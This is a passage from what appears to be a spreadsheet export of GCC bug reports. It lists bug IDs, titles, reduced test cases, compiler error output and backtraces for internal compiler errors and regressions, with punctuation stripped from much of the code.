GNU C++ (GCC) version 4.7.0 20111105 (experimental) (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.7.0 20111105 (experimental) GMP version 5.0.2 MPFR version 3.0.0-p3 MPC version 0.9
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C++ (GCC) version 4.7.0 20111105 (experimental) (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.7.0 20111105 (experimental) GMP version 5.0.2 MPFR version 3.0.0-p3 MPC version 0.9
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 1c96d36acbd98a4b9c0fb64069912a60
main.cpp: In instantiation of 'void f() [with int ...IS = {0 1 2}]':
main.cpp:9:14:   required from here
main.cpp:4:3: internal compiler error: unexpected expression 'IS' of kind template_parm_index
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
cryolite@blueplanet:~/work/test$ cat main.ii
# 1 main.cpp
# 1 
# 1 main.cpp
template
void f()
{
  for (int i : IS)
}
int main()
{
  f()
}</t>
  </si>
  <si>
    <t>GCC-37161</t>
  </si>
  <si>
    <t>[4.4 Regression]: Revision 139225 caused gfortran.dg/vect/pr33301.f  -O</t>
  </si>
  <si>
    <t>On Linux/ia32 I saw
Running target unix/-m32
FAIL: gfortran.dg/vect/pr33301.f  -O  (internal compiler error)
FAIL: gfortran.dg/vect/pr33301.f  -O  (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-64408</t>
  </si>
  <si>
    <t>fr30-elf ICE in extract_insn at recog.c:2202</t>
  </si>
  <si>
    <t>Created attachment 34334
preprocessed source
While compiling newlib-2.2.0 with gcc-4.9.2 --target=fr30-elf:
fr30-elf-gcc -B/usr/src/ports/cross-newlib/cross-newlib-2.2.0-1.x86_64/build/fr30-elf/fr30-elf/newlib/ -isystem /usr/src/ports/cross-newlib/cross-newlib-2.2.0-1.x86_64/build/fr30-elf/fr30-elf/newlib/targ-include -isystem /usr/src/ports/cross-newlib/cross-newlib-2.2.0-1.x86_64/src/newlib-2.2.0/newlib/libc/include -B/usr/src/ports/cross-newlib/cross-newlib-2.2.0-1.x86_64/build/fr30-elf/fr30-elf/libgloss/fr30 -L/usr/src/ports/cross-newlib/cross-newlib-2.2.0-1.x86_64/build/fr30-elf/fr30-elf/libgloss/libnosys -L/usr/src/ports/cross-newlib/cross-newlib-2.2.0-1.x86_64/src/newlib-2.2.0/libgloss/fr30    -DPACKAGE_NAME=\newlib\ -DPACKAGE_TARNAME=\newlib\ -DPACKAGE_VERSION=\2.2.0\ -DPACKAGE_STRING=\newlib\ 2.2.0\ -DPACKAGE_BUGREPORT=\\ -DPACKAGE_URL=\\ -I. -I/usr/src/ports/cross-newlib/cross-newlib-2.2.0-1.x86_64/src/newlib-2.2.0/newlib/libc/stdlib -fno-builtin      -g -Os -c -o lib_a-dtoa.o `test -f 'dtoa.c' || echo '/usr/src/ports/cross-newlib/cross-newlib-2.2.0-1.x86_64/src/newlib-2.2.0/newlib/libc/stdlib/'`dtoa.c
/usr/src/ports/cross-newlib/cross-newlib-2.2.0-1.x86_64/src/newlib-2.2.0/newlib/libc/stdlib/dtoa.c: In function â€˜_dtoa_râ€™:
/usr/src/ports/cross-newlib/cross-newlib-2.2.0-1.x86_64/src/newlib-2.2.0/newlib/libc/stdlib/dtoa.c:862:1: error: unrecognizable insn:
 }
 ^
(insn 211 210 212 2 (set (reg/v:DI 326 [ d ])
        (subreg:DI (reg/v:DF 331 [ _d ]) 0)) /usr/src/ports/cross-newlib/cross-newlib-2.2.0-1.x86_64/src/newlib-2.2.0/newlib/libc/stdlib/dtoa.c:236 -1
     (nil))
/usr/src/ports/cross-newlib/cross-newlib-2.2.0-1.x86_64/src/newlib-2.2.0/newlib/libc/stdlib/dtoa.c:862:1: internal compiler error: in extract_insn at recog.c:2202</t>
  </si>
  <si>
    <t>GCC-11555</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE in verify_loop_structure at cfgloop.c:1270</t>
  </si>
  <si>
    <t>This code fails to compile with -O{12} -ftracer -funroll-loops options. When
-O{03} is used or either -ftracer or -funroll-loops option is removed it
compiles. Testcase has been derived from gas/expr.c.
$ gcc -v
Reading specs from /usr/local/lib/gcc-lib/i686-pc-cygwin/3.3.1/specs
Configured with: ../srcdir/configure --srcdir=/cygdrive/c/WilX/gcc33/srcdir --en
able-threads=posix --enable-languages=cc++ --enable-nls --without-included-gett
ext --enable-version-specific-runtime-libs --enable-dwarf2 --with-arch=atholn --
with-cpu=athlon
Thread model: posix
gcc version 3.3.1 20030716 (prerelease)
$ gcc-34 -O1 -ftracer -funroll-loops -c testcase2.c
testcase2.c: In function `mri_char_constant':
testcase2.c:20: error: Edge from 16 to 8 should not be marked irreducible.
testcase2.c:20: error: Edge from 50 to 8 should not be marked irreducible.
testcase2.c:20: internal compiler error: in verify_loop_structure at cfgloop.c:
1270
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
----8&lt;-----
extern char *input_line_pointer
static void mri_char_constant (void)
{
  int i
  for (i = (20) - 1 i &gt;= 0 i--)
    {
      int j
      for (j = 0 j &lt; (1 &lt;&lt; (1)) j++)
	{
	  if (*input_line_pointer == '\'')
	    {
	      if (input_line_pointer[1] != '\'')
		break
	    }
	}
    }
}</t>
  </si>
  <si>
    <t>GCC-33696</t>
  </si>
  <si>
    <t>[4.3 Regression] Type checking error with unary minus and subtraction</t>
  </si>
  <si>
    <t>typedef unsigned char uint8_t
typedef unsigned int uint_least32_t
extern int foo (long int __off)
void write (uint_least32_t chunk_len)
{
     uint8_t tmp[4]
     foo (-(long)chunk_len - sizeof(tmp))
}
smm.3.min.ii: In function 'write':
smm.3.min.ii:5: error: type mismatch in binary expression
long unsigned int
long unsigned int
long int
D.1197 = 4294967292 - chunk_len.0
smm.3.min.ii:5: internal compiler error: verify_gimple failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-45283</t>
  </si>
  <si>
    <t>performance/30_threads/future/polling.cc fails at compile time</t>
  </si>
  <si>
    <t>I get the below. Jon can you have a look? Thanks in advance...
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/performance/30_threads/future/polling.cc: In function â€˜void poll(std::shared_future)â€™:
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/performance/30_threads/future/polling.cc:25:13: error: â€˜class std::shared_futureâ€™ has no member named â€˜is_readyâ€™
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/performance/30_threads/future/polling.cc: In function â€˜int main()â€™:
/home/paolo/Gcc/svn-dirs/trunk/libstdc++-v3/testsuite/performance/30_threads/future/polling.cc:49:13: error: â€˜class std::shared_futureâ€™ has no member named â€˜is_readyâ€™</t>
  </si>
  <si>
    <t>GCC-66549</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE on valid in OMP parallel region</t>
  </si>
  <si>
    <t>The following causes an ICE with gfortran 6.0 (r224494):
module smfa
  type :: sgc
   contains
     procedure :: sla =&gt; sa
  end type sgc
  class(sgc) pointer :: sg_
  double precision allocatable dimension(:) :: vni 
contains
  double precision function sa(selfi)
    class(sgc) intent(in   ) :: self
  end function sa
  subroutine cvn(sg_vn)
    class(sgc) intent(inout) :: sg_
    double precision intent(  out) dimension(:) :: vn
    integer :: i
    do i=12
       vn(i)= sg_%sla(i)
    end do
  end subroutine cvn
  subroutine clwf()
    !$omp parallel
    call cvn(sg_vni)
    !$omp end parallel
  end subroutine clwf
end module smfa
$ gfortran -v
Using built-in specs.
COLLECT_GCC=/opt/gcc-trunk/bin/gfortran
COLLECT_LTO_WRAPPER=/opt/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/opt/gcc-trunk --enable-languages=cc++fortran --disable-multilib
Thread model: posix
gcc version 6.0.0 20150615 (experimental) (GCC)
$ gfortran -c test2.F90 -O2 -fopenmp
test2.F90:12:0:
   subroutine cvn(sg_vn)
^
internal compiler error: in create_component_ref_by_pieces_1 at tree-ssa-pre.c:2585
0xcfb5bf create_component_ref_by_pieces_1
        ../../gcc-trunk/gcc/tree-ssa-pre.c:2585
0xcfb02f create_component_ref_by_pieces_1
        ../../gcc-trunk/gcc/tree-ssa-pre.c:2538
0xcfacb0 create_component_ref_by_pieces_1
        ../../gcc-trunk/gcc/tree-ssa-pre.c:2594
0xcfa40e create_component_ref_by_pieces
        ../../gcc-trunk/gcc/tree-ssa-pre.c:2735
0xcfa40e create_expression_by_pieces
        ../../gcc-trunk/gcc/tree-ssa-pre.c:2826
0xcfb875 insert_into_preds_of_block
        ../../gcc-trunk/gcc/tree-ssa-pre.c:3025
0xcff1de do_regular_insertion
        ../../gcc-trunk/gcc/tree-ssa-pre.c:3353
0xcff1de insert_aux
        ../../gcc-trunk/gcc/tree-ssa-pre.c:3563
0xcfe807 insert_aux
        ../../gcc-trunk/gcc/tree-ssa-pre.c:3573
0xcfe807 insert_aux
        ../../gcc-trunk/gcc/tree-ssa-pre.c:3573
0xcfe807 insert_aux
        ../../gcc-trunk/gcc/tree-ssa-pre.c:3573
0xd0126d insert
        ../../gcc-trunk/gcc/tree-ssa-pre.c:3596
0xd0126d execute
        ../../gcc-trunk/gcc/tree-ssa-pre.c:4864
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
If compiled with -O1 instead of -O2 a different ICE occurs:
$ gfortran -c test2.F90 -O1 -fopenmp
test2.F90:16:0:
     do i=12
^
internal compiler error: in make_decl_rtl at varasm.c:1320
0xe3f385 make_decl_rtl(tree_node*)
        ../../gcc-trunk/gcc/varasm.c:1316
0x854c93 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        ../../gcc-trunk/gcc/expr.c:9489
0x861bbe expand_expr
        ../../gcc-trunk/gcc/expr.h:255
0x861bbe expand_assignment(tree_node* tree_node* bool)
        ../../gcc-trunk/gcc/expr.c:5130
0x755a95 expand_gimple_stmt_1
        ../../gcc-trunk/gcc/cfgexpand.c:3318
0x755a95 expand_gimple_stmt
        ../../gcc-trunk/gcc/cfgexpand.c:3414
0x757ebc expand_gimple_basic_block
        ../../gcc-trunk/gcc/cfgexpand.c:5426
0x75e846 execute
        ../../gcc-trunk/gcc/cfgexpand.c:6045
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
If compiled without -fopenmp compilation is successful.</t>
  </si>
  <si>
    <t>abensonca</t>
  </si>
  <si>
    <t>GCC-69845</t>
  </si>
  <si>
    <t>[4.9 Regression] Expression getting incorrectly optimized after being rewritten by compiler</t>
  </si>
  <si>
    <t>Created attachment 37709
Test case
In the given example when evaluating the expression for 'C' there should be no overflow. I am however seeing the compiler rewrite the expressions into a form that will overflow.
I have only tested this on x86 and x86_64 and according to 5.1.2.3p14 since these archs do not trap on overflow this is legal behaviour. Because of the phrasing that the expression can only be rewritten if the same results occur I have to assume this means the newly added overflow does not cause undefined behaviour. The compiler added it knowing that it will not trap and that positive and negative overflow cancel after all.
With that in mind it looks like one of the optimization passes is taking advantage of this and causing incorrect results (optimizes everything to a call to puts(failed\n)). When I compile the test case with -O0 it will pass but -O1 and above will cause the test case to fail.
Given the problem description it should come as no surprise that the problem is not seen when -fwrapv or -ftrapv are used.
I have tested on Ubuntu 14.04 x86_64 with GCC 4.8.3 4.9.3 and 5.3.0. 4.8.3 does not reproduce 4.9.3 and 5.3.0 do.</t>
  </si>
  <si>
    <t>mdaniels</t>
  </si>
  <si>
    <t>GCC-14901</t>
  </si>
  <si>
    <t>Internal writes do not pad with blanks</t>
  </si>
  <si>
    <t>Internal writes do not seem to pad the string with blanks.  The following 
small programme illustrates the problem: 
subroutine x (a) 
  implicit none 
  character(*) a 
  print *len(a)[a] 
end subroutine x 
character s*10 
write (s '(hello)') 
call x (trim(s)) 
write (s '(hello     )') 
call x (trim(s)) 
end program 
The programm should output 
           5 [hello] 
           5 [hello] 
but it prints instead 
          10 [hello 
] 
           5 [hello] 
indicating that there are leftover characters in the second half of the string 
s that should not be there.</t>
  </si>
  <si>
    <t>GCC-13735</t>
  </si>
  <si>
    <t>avr-elf ICE while building libgcc</t>
  </si>
  <si>
    <t>ICE while building libgcc
libgcc2.c:995: error: insn does not satisfy its constraints:
(insn 1004 1003 1005 90 /home/kazu/gnu/gcc/gcc-commit/gcc/gcc/libgcc2.c:987 (set
(mem:QI (plus:HI (reg:HI 26 r26 [30])
                (const_int 1 [0x1])) [2 S1 A8])
        (reg:QI 24 r24 [orig:275+1 ] [275])) 9 {*movqi} (insn_list 1003
(insn_list 1433 (nil)))
    (expr_list:REG_DEAD (reg:QI 24 r24 [orig:275+1 ] [275])
        (nil)))
/home/kazu/gnu/gcc/gcc-commit/gcc/gcc/libgcc2.c:995: internal compiler error: in
extract_constrain_insn_cached at recog.c:2000
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-31705</t>
  </si>
  <si>
    <t>inline assembler causes ICE: extract_constrain_insn_cached at recog.c:2002</t>
  </si>
  <si>
    <t>The source file:
double helperDoubleTan(double * a double * b)
{
        double tmpA tmpB
        tmpA = *a
        {
                double y[3] = { 0.0 0.0 0.0 }
                double r
                int lq
                lq = __ieee754_rem_pio2(tmpA y)
                r = y[0]
                if (lq &amp; 0x1) {
                  __asm__ __volatile__(fptan fdivpfchs: =
                  tmpB = __kernel_tan(y[0] y[1] 1 - ((lq 
                } else {
                        tmpB = tan(r)
                }
        }
        *b = tmpB
        return 0
}
compiled with gcc -O -c testcase.c
results in:
testcase.c: In function â€˜helperDoubleTanâ€™:
testcase.c:17: warning: incompatible implicit declaration of built-in function â€˜tanâ€™
testcase.c:22: error: unrecognizable insn:
(insn 36 34 96 (parallel [
            (set (reg/v:DF 8 st [orig:58 tmpB.26 ] [58])
                (asm_operands/v:DF (fptan fdivpfchs) (=&amp;t) 0 [
                        (reg:DF 8 st)
                    ]
                     [
                        (asm_input:DF (f))
                    ] (testcase.c) 14))
            (clobber (reg:QI 19 dirflag))
            (clobber (reg:QI 18 fpsr))
            (clobber (reg:QI 17 flags))
        ]) -1 (nil)
    (expr_list:REG_UNUSED (reg:QI 17 flags)
        (expr_list:REG_UNUSED (reg:QI 18 fpsr)
            (expr_list:REG_UNUSED (reg:QI 19 dirflag)
                (expr_list:REG_UNUSED (reg/v:DF 8 st [orig:58 tmpB.26 ] [58])
                    (nil))))))
Output from gcc -v:
gcc -v
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.1 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --enable-checking=release i486-linux-gnu
Thread model: posix
gcc version 4.1.2 (Ubuntu 4.1.2-0ubuntu4)</t>
  </si>
  <si>
    <t>fultonm</t>
  </si>
  <si>
    <t>GCC-11957</t>
  </si>
  <si>
    <t>[3.4 Regression] wrong warning: statement has no effect</t>
  </si>
  <si>
    <t># cat x.cpp 
#include  
const std::string str[ 1 ] = { a } 
const std::wstring wstr[ 1 ] = { La } 
# c++ -Wall -c x.cpp 
x.cpp:3: warning: statement has no effect 
x.cpp:4: warning: statement has no effect 
Should be self-explanatory.</t>
  </si>
  <si>
    <t>GCC-59340</t>
  </si>
  <si>
    <t>[4.9 Regression] LRA enable-checking bootstrap failure since r205136</t>
  </si>
  <si>
    <t>The following code has been added to s390_decompose_address for the LRA enablement to prevent strict displacement checking for addresses including eliminable registers. Only during LRA execution the displacements are expected to be valid. 
199754   vmakarov       if (lra_in_progress
199754   vmakarov         || (base != arg_pointer_rtx
199754   vmakarov             &amp;&amp; indx != arg_pointer_rtx
199754   vmakarov             &amp;&amp; base != return_address_pointer_rtx
199754   vmakarov             &amp;&amp; indx != return_address_pointer_rtx
199754   vmakarov             &amp;&amp; base != frame_pointer_rtx
199754   vmakarov             &amp;&amp; indx != frame_pointer_rtx
199754   vmakarov             &amp;&amp; base != virtual_stack_vars_rtx
199754   vmakarov             &amp;&amp; indx != virtual_stack_vars_rtx))
However with:
Author: law
Date: Wed Nov 20 18:17:49 2013
New Revision: 205136
URL: http://gcc.gnu.org/viewcvs?rev=205136&amp;root=gcc&amp;view=rev
Log:
    	* lra.c (lra): Set lra_in_progress before check_rtl call.
    	* recog.c (insn_invalid_p): Add !lra_in_progress to prevent
    	adding clobber regs when LRA is running
Modified:
    trunk/gcc/ChangeLog
    trunk/gcc/lra.c
    trunk/gcc/recog.c
the lra_in_progress = 1 statement has been moved before the initial LRA check_rtl invokation so s390_decompose_address now expects the displacements to be valid already what obviously is not the case.
This leads to a bootstrap failure:
/home/andreas/patched/gcc-head/libgcc/libgcc2.c: In function â€˜__mulsc3â€™:
/home/andreas/patched/gcc-head/libgcc/libgcc2.c:1932:1: error: insn does not satisfy its constraints:
 }
 ^
(insn 21 26 23 2 (set (mem/c:SF (plus:DI (reg/f:DI 34 %fp)
                (const_int -16 [0xfffffffffffffff0])) [2 ac+0 S4 A64])
        (reg:SF 108 [ D.5596 ])) /home/andreas/patched/gcc-head/libgcc/libgcc2.c:1874 88 {movsf}
     (expr_list:REG_DEAD (reg:SF 108 [ D.5596 ])
        (nil)))
/home/andreas/patched/gcc-head/libgcc/libgcc2.c:1932:1: internal compiler error: in check_rtl at lra.c
:2043
It can easily be reproduced with:
cc1 -O0 t.c
t.c:
void foo (int a) {}</t>
  </si>
  <si>
    <t>vmakarov</t>
  </si>
  <si>
    <t>GCC-64012</t>
  </si>
  <si>
    <t>GCC-4.9.2 option -fcaller-saves in -O2</t>
  </si>
  <si>
    <t>A cross toolchain build by GCC-4.9.2 when I use this toolchain to compile kernel-3.4.35 with option -O2 it always crash when system power up.
(CPU : armv-7 cortex-a9)
-----------Crash log------------------------------
Unable to handle kernel paging request at virtual address ffffffff
pgd = c0004000
[ffffffff] *pgd=85ffe821 *pte=00000000 *ppte=00000000
Internal error: Oops: 17 [#1] SMP ARM
Modules linked in:
CPU: 1    Not tainted  (3.4.35_hi3535 #27)
PC is at kmem_cache_alloc+0x54/0x130
LR is at con_insert_unipair+0xc0/0x10c
pc : []    lr : []    psr: a0000013
sp : c5831e60  ip : c05b27d8  fp : c5831e94
r10: 00000263  r9 : 00000003  r8 : 0000005f
r7 : 0000005f  r6 : 000000d0  r5 : c5802200  r4 : ffffffff
r3 : 00000000  r2 : c5830000  r1 : c05a69e0  r0 : 0011e000
Flags: NzCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment kernel
Control: 10c53c7d  Table: 8000404a  DAC: 00000015
-------------Assembler code-------------------------
c00a5710 :
c00a5710:	e1a0c00d 	mov	ip sp
c00a5714:	e92ddff0 	push	{r4 r5 r6 r7 r8 r9 sl fp ip lr pc}
c00a5718:	e24cb004 	sub	fp ip #4
c00a571c:	e24dd00c 	sub	sp sp #12
c00a5720:	e1a0300d 	mov	r3 sp
c00a5724:	e3c32d7f 	bic	r2 r3 #8128	 0x1fc0
c00a5728:	e302c7d8 	movw	ip #10200	 0x27d8
c00a572c:	e3c2203f 	bic	r2 r2 #63	 0x3f
c00a5730:	e34cc05b 	movt	ip #49243	 0xc05b
c00a5734:	e1a05000 	mov	r5 r0
c00a5738:	e1a06001 	mov	r6 r1
c00a573c:	e50be030 	str	lr [fp #-48]	 0x30
c00a5740:	e5923014 	ldr	r3 [r2 #20]
c00a5744:	e5951000 	ldr	r1 [r5]
c00a5748:	e79c0103 	ldr	r0 [ip r3 lsl #2]
c00a574c:	e0813000 	add	r3 r1 r0
c00a5750:	e593a004 	ldr	sl [r3 #4]
c00a5754:	e7914000 	ldr	r4 [r1 r0]
c00a5758:	e3540000 	cmp	r4 #0
c00a575c:	0a000026 	beq	c00a57fc 
c00a5760:	e5953014 	ldr	r3 [r5 #20]
c00a5764:	e7949003 	ldr	r9 [r4 r3]    ---&gt;r4 is ffffffff
c00a5768:	e10f8000 	mrs	r8 CPSR
----------------------------------------------
When I compile kernel with -O1 or -O2 -fno-caller-saves it is ok no crash.
(GCC-4.8 not have this problem)
Question:
1. Please tell me about option -fcaller-saves in GCC-4.9.2. Is it different from GCC-4.8?
2. The error happen in code con_insert_unipair()-&gt;kmem_cache_alloc()-&gt;slab_alloc() file path is linux-3.4.35\mm\slub.c.
What codes will -fcaller-saves optimize? Please give me some samples.
3.-fcaller-saves may be not the root cause.
Generally we use -O2 include -fcaller-saves we want to keep -fcaller-saves please help me to solve it.</t>
  </si>
  <si>
    <t>airbak.li</t>
  </si>
  <si>
    <t>GCC-24686</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE when building a variation of NMSTL</t>
  </si>
  <si>
    <t>We have a customized version of the NMSTL library and get an ICE when we build it. (Sorry I couldn't find directions on how to fill out Host triplet Target triplet and Build triplet.)
I'm using Ubuntu Linux 5.10.</t>
  </si>
  <si>
    <t>christian.convey</t>
  </si>
  <si>
    <t>GCC-58300</t>
  </si>
  <si>
    <t>ICE: in decide_is_symbol_needed at cgraphunit.c:233 with -fvtable-verify=preinit on invalid code</t>
  </si>
  <si>
    <t>Created attachment 30742
reduced testcase
Compiler output:
$ gcc -fvtable-verify=preinit testcase.C 
testcase.C:2:1: error: explicit specialization of non-template 'A'
 {
 ^
testcase.C:4:2: internal compiler error: in decide_is_symbol_needed at cgraphunit.c:233
 }
  ^
0x887ed8 decide_is_symbol_needed(symtab_node_def*)
        /mnt/svn/gcc-trunk/gcc/cgraphunit.c:232
0x888468 cgraph_finalize_function(tree_node* bool)
        /mnt/svn/gcc-trunk/gcc/cgraphunit.c:459
0x889f69 cgraph_process_new_functions()
        /mnt/svn/gcc-trunk/gcc/cgraphunit.c:306
0x79d756 vtv_generate_init_routine()
        /mnt/svn/gcc-trunk/gcc/cp/vtable-class-hierarchy.c:1190
0x68fc46 cp_write_global_declarations()
        /mnt/svn/gcc-trunk/gcc/cp/decl2.c:4373
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gcc -v                                 
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-202158-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-202158-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl
Thread model: posix
gcc version 4.9.0 20130902 (experimental) (GCC)</t>
  </si>
  <si>
    <t>cmtice</t>
  </si>
  <si>
    <t>GCC-42505</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6 Regression] loop canonicalization causes a lot of unnecessary temporary variables</t>
  </si>
  <si>
    <t>This regression was caused by loop canonicalization.
The following example:
struct A {
 int f1
 int f2
}
int func(int c)
int test(struct A* src struct A* dst int count)
{
  while (count--) {
    if (!func(src-&gt;f2)) {
        return 0
      }
      *dst++ = *src++
  }
  return 1
}
gcc 4.2.1 compiles this to 40 bytes gcc 4.4.0 to 48 bytes:
gcc 4.2.1 output:
test:
      push    {r4 r5 r6 lr}
      mov     r4 r0
      mov     r5 r1
      mov     r6 r2
      b       .L2
.L3:
      ldr     r0 [r4 #4]
      bl      func
      cmp     r0 #0
      beq     .L6
      mov     r3 r5
      mov     r2 r4
      ldmia   r2! {r0 r1}
      stmia   r3! {r0 r1}
      mov     r5 r3
      mov     r4 r2
.L2:
      sub     r6 r6 #1
      bcs     .L3
      mov     r0 #1
.L6:
      @ sp needed for prologue
      pop     {r4 r5 r6 pc}
gcc 4.4.0 output:
      push    {r4 r5 r6 r7 lr}    // note r7 is cloberred
      sub     sp sp #12         // why need to store smth on the stack?
      mov     r7 r0
      str     r1 [sp #4]          // why store r1 onto stack?
      mov     r6 r2
      mov     r5 #0
      b       .L2
.L5:
      add     r4 r7 r5
      ldr     r0 [r4 #4]
      bl      func
      sub     r6 r6 #1
      cmp     r0 #0
      beq     .L4
      ldr     r1 [sp #4]   // load from stack
      add     r3 r1 r5
      add     r5 r5 #8
      ldmia   r4! {r1 r2}
      stmia   r3! {r1 r2}
.L2:
      cmp     r6 #0
      bne     .L5
      mov     r0 #1
.L4:
      add     sp sp #12
      @ sp needed for prologue
      pop     {r4 r5 r6 r7 pc}
This is caused by loop canonicalization pass (pass_iv_optimize) that was added in gcc 4.4.
Final GIMPLE form in gcc 4.2.1 compiler:
test (src dst count)
{
 int a
 int D.1545
:
 goto  ()
:
 a = func (MEM[base: src offset: 4])
 if (a == 0) goto  else goto 
:
 D.1545 = 0
 goto  ()
:
 MEM[base: dst] = MEM[base: src]
 dst = dst + 8B
 src = src + 8B
:
 count = count - 1
 if (count != -1) goto  else goto 
:
 D.1545 = 1
:
 return D.1545
}
The final GIMPLE in gcc 4.4:
test (struct A * src struct A * dst int count)
{
 unsigned int ivtmp.22 // induction variables introduced by pass_iv_optimize
 unsigned int ivtmp.19
 int a
 int D.1274
:
 ivtmp.22 = (unsigned int) count  // copy of count count itself is not used anymore
 ivtmp.19 = 0
 goto 
:
 a = func (MEM[base: src + ivtmp.19 offset: 4])
 ivtmp.22 = ivtmp.22 - 1
 if (a == 0)
   goto 
 else
   goto 
:
 D.1274 = 0
 goto 
:
 MEM[base: dst index: ivtmp.19] = MEM[base: src index: ivtmp.19]
 ivtmp.19 = ivtmp.19 + 8
:
 if (ivtmp.22 != 0)
   goto 
 else
   goto 
:
 D.1274 = 1
:
 return D.1274
}
The following RTL passes could not optimize these temporary induction variables and they are spilled on the stack which causes a lot of other inefficiencies.
The main question: there are three way to fix this:
1) turn off loop canonicalization for -Os
2) optimize the extra variable in the GIMPLE passes
3) optimize the extra variable in the RTL passes</t>
  </si>
  <si>
    <t>GCC-24578</t>
  </si>
  <si>
    <t>compiler emits call to floorf() instead of floor()</t>
  </si>
  <si>
    <t>Compiling the following code on MIPS emits a function call to floorf (not floor).  This is a problem when one's libc does not contain a floorf function.
void func (float *dest float *src)
{
        *dest = floor (*src)
}
Compile using 'mipsel-linux-uclibc-gcc -O2 -save-temps -c it.c'.</t>
  </si>
  <si>
    <t>GCC-70295</t>
  </si>
  <si>
    <t>[6 Regression] bogus -Wnonnull-compare for dynamic_cast(this) != nullptr</t>
  </si>
  <si>
    <t>trippels@CFARM-IUT-TLSE3 ~ % cat fudraw.ii
enum SdrHitKind {}
class FuSelection {
  void m_fn1(void *)
}
void FuSelection::m_fn1(void *) {
  SdrHitKind eHit
  if (eHit &amp;&amp; dynamic_cast(this) != nullptr)
}
trippels@CFARM-IUT-TLSE3 ~ % g++ -c -O2 -Wnonnull-compare fudraw.ii 
fudraw.ii: In member function â€˜void FuSelection::m_fn1(void*)â€™:
fudraw.ii:7:55: warning: nonnull argument â€˜thisâ€™ compared to NULL [-Wnonnull-compare]
   if (eHit &amp;&amp; dynamic_cast(this) != nullptr)
               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~</t>
  </si>
  <si>
    <t>GCC-9857</t>
  </si>
  <si>
    <t>strtok() causes segmentation faults</t>
  </si>
  <si>
    <t>i noticed some strange behavior with using the strtok() function it worked normally into my program until i got the bright idea of making a function out of some duplicate code and it mysteriously caused strtok to seg fault even though the functions that i made don't call it
i tried to reproduce this on a smaller scale w/o sending you my program so here's what i came up with i didn't think this was going to seg fault at all but it did so...
#include 
#include 
#define DELIMS  \t\n
typedef struct
{
	char   uin[9]			/* User ID */
	char   last[20]		/* Last name */
	char   first[15]		/* First name */
	int    grades[6]		/* List of student's 6 grades */
	float  average			/* Student's average */
} studentRecord
int main(void)
{
	int i
	studentRecord *stuRec
	char *string = jdoe\tDoe\tJohn\t98\t90\t87\t88\t86\t82\t88.5
	stuRec = (studentRecord *) malloc(sizeof(studentRecord))
	strcpy(stuRec-&gt;uin	strtok(string DELIMS))
	strcpy(stuRec-&gt;last	strtok(NULL DELIMS))
	strcpy(stuRec-&gt;first	strtok(NULL DELIMS))
	for(i = 0 i &lt; 6 ++i)
		stuRec-&gt;grades[i] = atoi(strtok(NULL DELIMS))
	stuRec-&gt;average	= atof(strtok(NULL DELIMS))
}
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.3 2.96-110)
Environment:
red hate 7.3
How-To-Repeat:
just compile the above example with a gcc filename.c and do an ./a.out</t>
  </si>
  <si>
    <t>ocmbah</t>
  </si>
  <si>
    <t>GCC-5223</t>
  </si>
  <si>
    <t>Templated operator== not found in presence of other instantiation</t>
  </si>
  <si>
    <t>First noticed as a compile error when including the STLport-4.5  *after* my own headers. The original error reported that there was no match for a templated comparison operator and listed only one potential candidate although others were declared:
f:/stlport/STLport-4.5/stlport/stl/char_traits.h:77: candidates are: bool _STL::operator ==(const _STL::fpos &amp; const _STL::fpos &amp;)
After some binary chopping on the .i file from my original program I reduced the error to a simplified example. Here's the short .ii file:
// Begin code
# 1 operators.cc
template class A {}
template
bool operator== (const A &amp;ax const A &amp;ay)
{
  return true
}
namespace blah
{
  template  class B
  {
    friend bool operator==(const B &amp;x const B &amp;y)
    {
      return true
    }
  }
}
int main ()
{
  A ai
  A ad
  blah::B ()
  ai == ad
  return 0
}
// End code
this .ii file was produced from the command
g++ -o operators.o -c operators.cc --save-temps
which produced the following compile error:
operators.cc: In function `int main()':
operators.cc:27: no match for `A &amp; == A &amp;'
